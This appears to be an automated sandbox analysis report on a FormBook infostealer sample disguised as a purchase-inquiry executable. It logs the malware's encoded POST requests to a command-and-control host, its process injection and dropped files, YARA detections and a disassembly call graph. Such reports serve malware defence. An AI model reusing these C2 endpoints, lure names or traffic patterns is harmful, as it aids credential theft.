                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18192.168.2.749989154.197.162.23980
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:13:13.492908955 CET783OUTPOST /cf9p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.investshares.net
                                              Origin: http://www.investshares.net
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.investshares.net/cf9p/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 71 69 2f 2f 65 55 70 50 65 69 42 71 32 7a 6d 48 70 71 67 63 4c 62 44 65 67 4f 48 2b 55 77 65 62 6c 51 62 76 45 59 5a 39 58 61 48 5a 2f 56 6d 4d 44 64 58 72 73 67 42 66 4c 32 39 43 55 38 30 77 35 79 41 4a 46 7a 45 71 56 6a 51 68 71 71 43 7a 65 48 6a 42 30 34 38 39 72 47 65 61 47 72 4a 49 36 6c 65 41 61 69 35 4a 4f 67 75 34 34 73 5a 72 30 6d 43 5a 72 45 4f 67 31 53 52 47 41 38 67 2f 49 2b 38 6e 6a 62 43 56 59 79 43 4c 6d 6f 32 76 4f 46 42 49 6d 6d 58 61 53 46 64 72 51 75 4b 77 70 7a 31 74 55 37 2f 6b 63 49 33 58 33 57 4b 5a 67 74 46 42 4f 6e 38 4f 4e 6e 4d 34 55 3d
                                              Data Ascii: ptH8A6=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLmo2vOFBImmXaSFdrQuKwpz1tU7/kcI3X3WKZgtFBOn8ONnM4U=
                                              Jan 13, 2025 15:13:14.070802927 CET309INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Sun, 12 Jan 2025 22:12:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19192.168.2.749990154.197.162.23980
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:13:16.038543940 CET1796OUTPOST /cf9p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.investshares.net
                                              Origin: http://www.investshares.net
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.investshares.net/cf9p/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 69 69 2f 4a 4b 55 6f 75 65 69 41 71 32 7a 6c 48 70 72 67 63 4b 44 44 65 70 48 48 2b 52 4e 65 64 70 51 55 76 59 59 4a 4d 58 61 4f 5a 2f 56 6b 4d 44 59 64 4c 73 70 42 66 62 36 39 43 6b 38 30 77 35 79 41 50 70 7a 45 2b 42 6a 4c 68 71 70 54 7a 65 62 75 68 31 56 38 39 79 35 65 61 54 55 49 34 61 6c 65 67 4b 69 37 66 69 67 74 59 34 71 59 72 30 2b 43 5a 6d 47 4f 67 70 34 52 46 64 5a 67 2f 77 2b 2b 42 2b 6c 52 6c 49 31 41 4b 2b 79 30 38 61 48 4a 5a 4f 4f 52 4b 57 54 44 73 38 5a 4b 69 4d 4d 39 50 63 53 78 67 42 33 75 32 72 42 4b 4e 4d 70 55 68 61 74 6e 2b 31 63 51 59 70 62 32 6b 46 73 71 47 72 2b 59 2f 30 38 6f 79 45 2f 4f 41 54 43 64 47 6c 73 50 58 44 38 55 45 2f 45 76 78 2f 62 44 59 53 66 2b 35 47 56 71 44 4a 6d 73 75 2f 4b 75 50 71 78 74 59 49 4b 56 51 39 70 70 63 37 32 61 62 37 54 76 45 45 37 74 6b 6a 6e 7a 45 4c 68 53 31 6c 30 72 71 48 57 45 70 37 4d 6e 4d 74 [TRUNCATED]
                                              Data Ascii: ptH8A6=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMii/JKUoueiAq2zlHprgcKDDepHH+RNedpQUvYYJMXaOZ/VkMDYdLspBfb69Ck80w5yAPpzE+BjLhqpTzebuh1V89y5eaTUI4alegKi7figtY4qYr0+CZmGOgp4RFdZg/w++B+lRlI1AK+y08aHJZOORKWTDs8ZKiMM9PcSxgB3u2rBKNMpUhatn+1cQYpb2kFsqGr+Y/08oyE/OATCdGlsPXD8UE/Evx/bDYSf+5GVqDJmsu/KuPqxtYIKVQ9ppc72ab7TvEE7tkjnzELhS1l0rqHWEp7MnMtx8Mg5QPBK7ixmCAtfOv2xYhzTx5hg6UtL1vgMBCQtt+YR7B60otxNOL6Wpz2n+/Gp8iz/l1dBcfBRNttxTO/81pqbkYuC4MXQwyurB1lgoshccyCaUtcIV9Blkscmev0QBJWWEYmaG1Yxfg4Fr47/VNRqk4ErSLWYevEVv8S7Fabzc7/9ysa1X0mGPFW2mKAbix3hDLa3MPTtQWAt0zo4YTd402/n/A1YXz+YduIURR/QOMH2QrHFC2pP9cUETK9IANfqeoDixyc5HW1bdzusep07msa7H534EFj+MzpDC38+SRWian4RK/qG9jvRoGhvuGCtDIufrKqtpSpZCnkfJDvJkfydkBDWqSYTEWWNjmFA62nkFVWwCQHmfbWksKP2d19atHyTQzIp/ic4H/EENHpUk8YQhe9u+4hEc0yONSeacg5d345+e405rNtIPE8YhV+wGHMYlQPspotPQ1e9OOdxUOlplEaVKZS1e5JMu1j1EM8OB7o2XMYNR4pBRGZF5KTuVEbNdVgL1N191+6hMtKm91UWoG1+jo4XQxp89VL1Bh0AcliMpMSEYQi4j43O6ru7U7x8ixBd4jX2EJgL0nu9VTxc0WUc33odRapq2xn9xQoixKxJVgu6vOkMzTKpy+LCd+JAZumIITEmpTW0uFZWdnFcsiTGn [TRUNCATED]
                                              Jan 13, 2025 15:13:16.637634039 CET309INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Sun, 12 Jan 2025 22:12:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:09:11:04
                                              Start date:13/01/2025
                                              Path:C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe"
                                              Imagebase:0xe60000
                                              File size:298'496 bytes
                                              MD5 hash:2A3034ABC9B8EE8875F9CD98C388AB07
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:09:11:37
                                              Start date:13/01/2025
                                              Path:C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe"
                                              Imagebase:0xc30000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:10
                                              Start time:09:11:39
                                              Start date:13/01/2025
                                              Path:C:\Windows\SysWOW64\fc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\fc.exe"
                                              Imagebase:0x240000
                                              File size:22'528 bytes
                                              MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:11
                                              Start time:09:11:52
                                              Start date:13/01/2025
                                              Path:C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe"
                                              Imagebase:0xc30000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:13
                                              Start time:09:12:04
                                              Start date:13/01/2025
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff722870000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:5.1%
                                                Signature Coverage:8.8%
                                                Total number of Nodes:136
                                                Total number of Limit Nodes:8
                                                execution_graph 95051 e7b7c3 95052 e7b807 95051->95052 95054 e7b828 95052->95054 95055 e8cb43 95052->95055 95056 e8cb60 95055->95056 95057 e8cb71 NtClose 95056->95057 95057->95054 95058 e7aa63 95059 e7aa7b 95058->95059 95061 e7aad5 95058->95061 95059->95061 95062 e7e993 95059->95062 95063 e7e9b9 95062->95063 95067 e7eab0 95063->95067 95068 e8fd43 RtlAllocateHeap RtlFreeHeap 95063->95068 95065 e7ea4e 95065->95067 95069 e8c193 95065->95069 95067->95061 95068->95065 95070 e8c1b0 95069->95070 95073 1542c0a 95070->95073 95071 e8c1dc 95071->95067 95074 1542c11 95073->95074 95075 1542c1f LdrInitializeThunk 95073->95075 95074->95071 95075->95071 95194 e744f3 95195 e7450d 95194->95195 95200 e77ca3 95195->95200 95197 e7452b 95198 e7455f PostThreadMessageW 95197->95198 95199 e74570 95197->95199 95198->95199 95202 e77cc7 95200->95202 95201 e77cce 95201->95197 95202->95201 95203 e77d03 LdrLoadDll 95202->95203 95204 e77d1a 95202->95204 95203->95204 95204->95197 95205 1542b60 LdrInitializeThunk 95076 e7402f 95077 e73fa6 95076->95077 95077->95076 95078 e73fb5 95077->95078 95080 e8cdd3 95077->95080 95081 e8cdf0 95080->95081 95084 1542c70 LdrInitializeThunk 95081->95084 95082 e8ce18 95082->95078 95084->95082 95085 e851a3 95090 e851bc 95085->95090 95086 e8524c 95087 e85204 95093 e8ec03 95087->95093 95090->95086 95090->95087 95091 e85247 95090->95091 95092 e8ec03 RtlFreeHeap 95091->95092 95092->95086 95096 e8ceb3 95093->95096 95095 e85214 95097 e8cecd 95096->95097 95098 e8cede RtlFreeHeap 95097->95098 95098->95095 95099 e8fca3 95100 e8fcb9 95099->95100 95101 e8fcb3 95099->95101 95104 e8ece3 95100->95104 95103 e8fcdf 95107 e8ce63 95104->95107 95106 e8ecfe 95106->95103 95108 e8ce80 95107->95108 95109 e8ce91 RtlAllocateHeap 95108->95109 95109->95106 95110 e8c143 95111 e8c15d 95110->95111 95114 1542df0 LdrInitializeThunk 95111->95114 95112 e8c185 95114->95112 95115 e8fd03 95116 e8ec03 RtlFreeHeap 95115->95116 95117 e8fd18 95116->95117 95206 e84e13 95207 e84e2f 95206->95207 95208 e84e6b 95207->95208 95209 e84e57 95207->95209 95210 e8cb43 NtClose 95208->95210 95211 e8cb43 NtClose 95209->95211 95212 e84e74 95210->95212 95213 e84e60 95211->95213 95216 e8ed23 RtlAllocateHeap 95212->95216 95215 e84e7f 95216->95215 95118 e61beb 95119 e61bf9 95118->95119 95122 e90173 95119->95122 95125 e8e7b3 95122->95125 95126 e8e7d9 95125->95126 95137 e67583 95126->95137 95128 e8e7ef 95136 e61d8c 95128->95136 95140 e7b5d3 95128->95140 95130 e8e80e 95131 e8e823 95130->95131 95155 e8cf03 95130->95155 95151 e886d3 95131->95151 95134 e8e83d 95135 e8cf03 ExitProcess 95134->95135 95135->95136 95158 e76953 95137->95158 95139 e67590 95139->95128 95141 e7b5ff 95140->95141 95169 e7b4c3 95141->95169 95144 e7b644 95147 e7b660 95144->95147 95149 e8cb43 NtClose 95144->95149 95145 e7b62c 95146 e7b637 95145->95146 95148 e8cb43 NtClose 95145->95148 95146->95130 95147->95130 95148->95146 95150 e7b656 95149->95150 95150->95130 95152 e88735 95151->95152 95154 e88742 95152->95154 95180 e78b13 95152->95180 95154->95134 95156 e8cf1d 95155->95156 95157 e8cf2a ExitProcess 95156->95157 95157->95131 95159 e76970 95158->95159 95161 e76989 95159->95161 95162 e8d583 95159->95162 95161->95139 95163 e8d59d 95162->95163 95164 e8d5cc 95163->95164 95165 e8c193 LdrInitializeThunk 95163->95165 95164->95161 95166 e8d62c 95165->95166 95167 e8ec03 RtlFreeHeap 95166->95167 95168 e8d645 95167->95168 95168->95161 95170 e7b4dd 95169->95170 95174 e7b5b9 95169->95174 95175 e8c233 95170->95175 95173 e8cb43 NtClose 95173->95174 95174->95144 95174->95145 95176 e8c250 95175->95176 95179 15435c0 LdrInitializeThunk 95176->95179 95177 e7b5ad 95177->95173 95179->95177 95181 e78b3d 95180->95181 95187 e7903b 95181->95187 95188 e74173 95181->95188 95183 e78c6a 95184 e8ec03 RtlFreeHeap 95183->95184 95183->95187 95185 e78c82 95184->95185 95186 e8cf03 ExitProcess 95185->95186 95185->95187 95186->95187 95187->95154 95192 e74193 95188->95192 95190 e741fc 95190->95183 95191 e741f2 95191->95183 95192->95190 95193 e7b8e3 RtlFreeHeap LdrInitializeThunk 95192->95193 95193->95191 95217 e79258 95218 e8cb43 NtClose 95217->95218 95219 e79262 95218->95219

                                                Executed Functions

                                                Function 00E78B13 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 46 e78b13-e78b4a call e8eca3 49 e78b55-e78b87 call e8eca3 call e64b43 call e847b3 46->49 50 e78b50 call e8eca3 46->50 57 e79046-e7904a 49->57 58 e78b8d-e78bb7 call e8ec53 49->58 50->49 61 e78bc2 58->61 62 e78bb9-e78bc0 58->62 63 e78bc4-e78bce 61->63 62->63 64 e78bd0 63->64 65 e78bef-e78c01 call e847e3 63->65 66 e78bd3-e78bd6 64->66 72 e78c07-e78c1f call e8e603 65->72 73 e79044-e79045 65->73 68 e78bdf-e78be9 66->68 69 e78bd8-e78bdb 66->69 68->65 69->66 71 e78bdd 69->71 71->65 72->73 76 e78c25-e78c75 call e74173 72->76 73->57 76->73 79 e78c7b-e78c9b call e8ec03 76->79 82 e78c9d-e78c9f 79->82 83 e78ccc-e78cce 79->83 84 e78cd7-e78cf9 call e7b673 82->84 85 e78ca1-e78caf call e8e173 call e670c3 82->85 83->84 86 e78cd0 83->86 84->73 92 e78cff-e78d21 call e8c363 84->92 94 e78cb4-e78cb9 85->94 86->84 95 e78d26-e78d2b 92->95 94->83 96 e78cbb-e78cca 94->96 95->73 97 e78d31-e78da7 call e8bd03 call e8bdb3 call e8ec53 95->97 96->97 104 e78db0 97->104 105 e78da9-e78dae 97->105 106 e78db2-e78de2 104->106 105->106 107 e78ebe 106->107 108 e78de8-e78dee 106->108 111 e78ec0 107->111 109 e78df0-e78df3 108->109 110 e78dfc-e78e1d call e8ec53 108->110 109->108 112 e78df5-e78df7 109->112 119 e78e1f-e78e27 110->119 120 e78e29 110->120 113 e78ec7-e78ecb 111->113 112->111 115 e78ed1-e78ed5 113->115 116 e78ecd-e78ecf 113->116 115->113 116->115 118 e78ed7-e78eeb 116->118 121 e78f55-e78fa8 call e77c23 * 2 call e8ec23 118->121 122 e78eed-e78ef2 118->122 123 e78e2c-e78e41 119->123 120->123 153 e78fcd-e78fd2 121->153 154 e78faa-e78fae 121->154 125 e78ef4-e78ef7 122->125 126 e78e54-e78e95 call e77ba3 call e8ec53 123->126 127 e78e43 123->127 130 e78f0e-e78f10 125->130 131 e78ef9-e78efc 125->131 149 e78e97-e78e9c 126->149 150 e78e9e 126->150 128 e78e46-e78e49 127->128 133 e78e52 128->133 134 e78e4b-e78e4e 128->134 130->125 138 e78f12-e78f14 130->138 131->130 136 e78efe-e78f00 131->136 133->126 134->128 139 e78e50 134->139 136->130 141 e78f02-e78f05 136->141 138->121 143 e78f16-e78f1e 138->143 139->126 141->130 145 e78f07 141->145 147 e78f23-e78f26 143->147 145->130 151 e78f4f-e78f53 147->151 152 e78f28-e78f2b 147->152 155 e78ea0-e78ebc call e750a3 149->155 150->155 151->121 151->147 152->151 156 e78f2d-e78f2f 152->156 158 e78fda-e78fec call e8bf13 153->158 159 e78fd4 153->159 157 e78fb0-e78fc1 call e67133 154->157 154->158 155->111 156->151 161 e78f31-e78f34 156->161 166 e78fc6-e78fcb 157->166 168 e78ff3-e79008 call e7b843 158->168 159->158 161->151 165 e78f36-e78f4c 161->165 165->151 166->153 166->168 171 e7900a-e79036 call e77ba3 * 2 call e8cf03 168->171 177 e7903b-e7903e 171->177 177->73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: "$"
                                                • API String ID: 0-3758156766
                                                • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                • Instruction ID: 882b458e2e4b2abeceecc48a82dc5ba9df15bf94042b8b54631b65b73c24fa2a
                                                • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                • Instruction Fuzzy Hash: C8F1A0B1D4020AAFDB24DB64CD89AEEB7B9EF54304F14D1A9E50DB7241DB309E45CBA0
                                                Function 00E61B91 Relevance: 2.9, Strings: 2, Instructions: 354COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 178 e61b91-e61b93 179 e61b95 178->179 180 e61c02-e61c31 178->180 182 e61b97-e61b9f 179->182 183 e61bf9-e61c00 179->183 181 e61c33-e61c4b 180->181 184 e61c4e-e61c54 181->184 185 e61c4d 181->185 189 e61b31 182->189 190 e61ba1-e61ba2 182->190 183->180 186 e61c32 183->186 184->181 188 e61c56-e61c5b 184->188 185->184 186->181 191 e61c60-e61c73 188->191 192 e61b33-e61b44 189->192 193 e61b1c 189->193 194 e61ba4 190->194 195 e61bcc-e61bd9 190->195 191->191 196 e61c75-e61c7d 191->196 197 e61b46 192->197 198 e61ba8-e61bb3 192->198 201 e61aae-e61ac1 193->201 202 e61b1e-e61b1f 193->202 194->198 214 e61b6b-e61b7c 195->214 215 e61bdb-e61be4 195->215 199 e61c84 196->199 200 e61c7f-e61c83 196->200 209 e61b49 197->209 204 e61bb6-e61bcb 198->204 206 e61c86 199->206 207 e61c89-e61c8f 199->207 200->199 203 e61ac5 201->203 208 e61b21-e61b30 202->208 202->209 210 e61ac6-e61ae3 203->210 211 e61a87-e61aad 203->211 204->195 206->207 207->196 216 e61c91-e61ca8 call e61170 207->216 208->189 213 e61b80-e61b89 209->213 210->203 223 e61ae5-e61aea 210->223 211->201 220 e61b1b 213->220 221 e61b8b-e61b8c 213->221 214->213 215->183 228 e61cb0-e61cc3 216->228 220->193 221->204 224 e61b8e-e61b90 221->224 226 e61af4-e61afe 223->226 227 e61aec 223->227 224->178 231 e61b00-e61b0d 226->231 232 e61af1 226->232 229 e61a84-e61a85 227->229 230 e61aee-e61af0 227->230 228->228 233 e61cc5 228->233 229->211 230->232 231->220 232->226 234 e61cc7-e61cdf 233->234 235 e61ce2-e61ce8 234->235 236 e61ce1 234->236 235->234 237 e61cea-e61cef 235->237 236->235 238 e61cf0-e61d03 237->238 238->238 239 e61d05 238->239 240 e61d07-e61d1f 239->240 241 e61d22-e61d28 240->241 242 e61d21 240->242 241->240 243 e61d2a-e61d58 call e61ed0 241->243 242->241 246 e61d60-e61d71 243->246 246->246 247 e61d73-e61d7f call e61000 246->247 249 e61d84-e61d8a call e90173 247->249 250 e61d8c-e61d99 249->250 251 e61da0-e61db1 250->251 251->251 252 e61db3-e61dca 251->252 253 e61dd0-e61dd9 252->253 253->253 254 e61ddb-e61de3 253->254
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: gfff$qi
                                                • API String ID: 0-3408824469
                                                • Opcode ID: f2321796db326caa4d5e26790d32298b7b42190df4ff02b7d4df2c086c5aa2be
                                                • Instruction ID: de3c4ccbffed3d453be11a3ce995a70a6fa294b80e5c4ba434625852ff4679f9
                                                • Opcode Fuzzy Hash: f2321796db326caa4d5e26790d32298b7b42190df4ff02b7d4df2c086c5aa2be
                                                • Instruction Fuzzy Hash: F5A1C1726883564FC70FCA6CAC926E8BF59DB513A4F1C62EED851EF1D2E211891687C0
                                                Function 00E77CA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 284 e77ca3-e77ccc call e8f7e3 287 e77cd2-e77ce0 call e8fde3 284->287 288 e77cce-e77cd1 284->288 291 e77ce2-e77ced call e90083 287->291 292 e77cf0-e77d01 call e8e283 287->292 291->292 297 e77d03-e77d17 LdrLoadDll 292->297 298 e77d1a-e77d1d 292->298 297->298
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00E77D15
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                • Instruction ID: efcdf800d9fcc6e5c069303d6fe62d12df9842f24e035a98fab3265714659dba
                                                • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                • Instruction Fuzzy Hash: 6E0112B5D0010DABDF10EBE4DC52FDDB7B89B54708F0081A5E90CA7240F671EB548B91
                                                Function 00E8CB43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 304 e8cb43-e8cb7f call e64903 call e8dd73 NtClose
                                                APIs
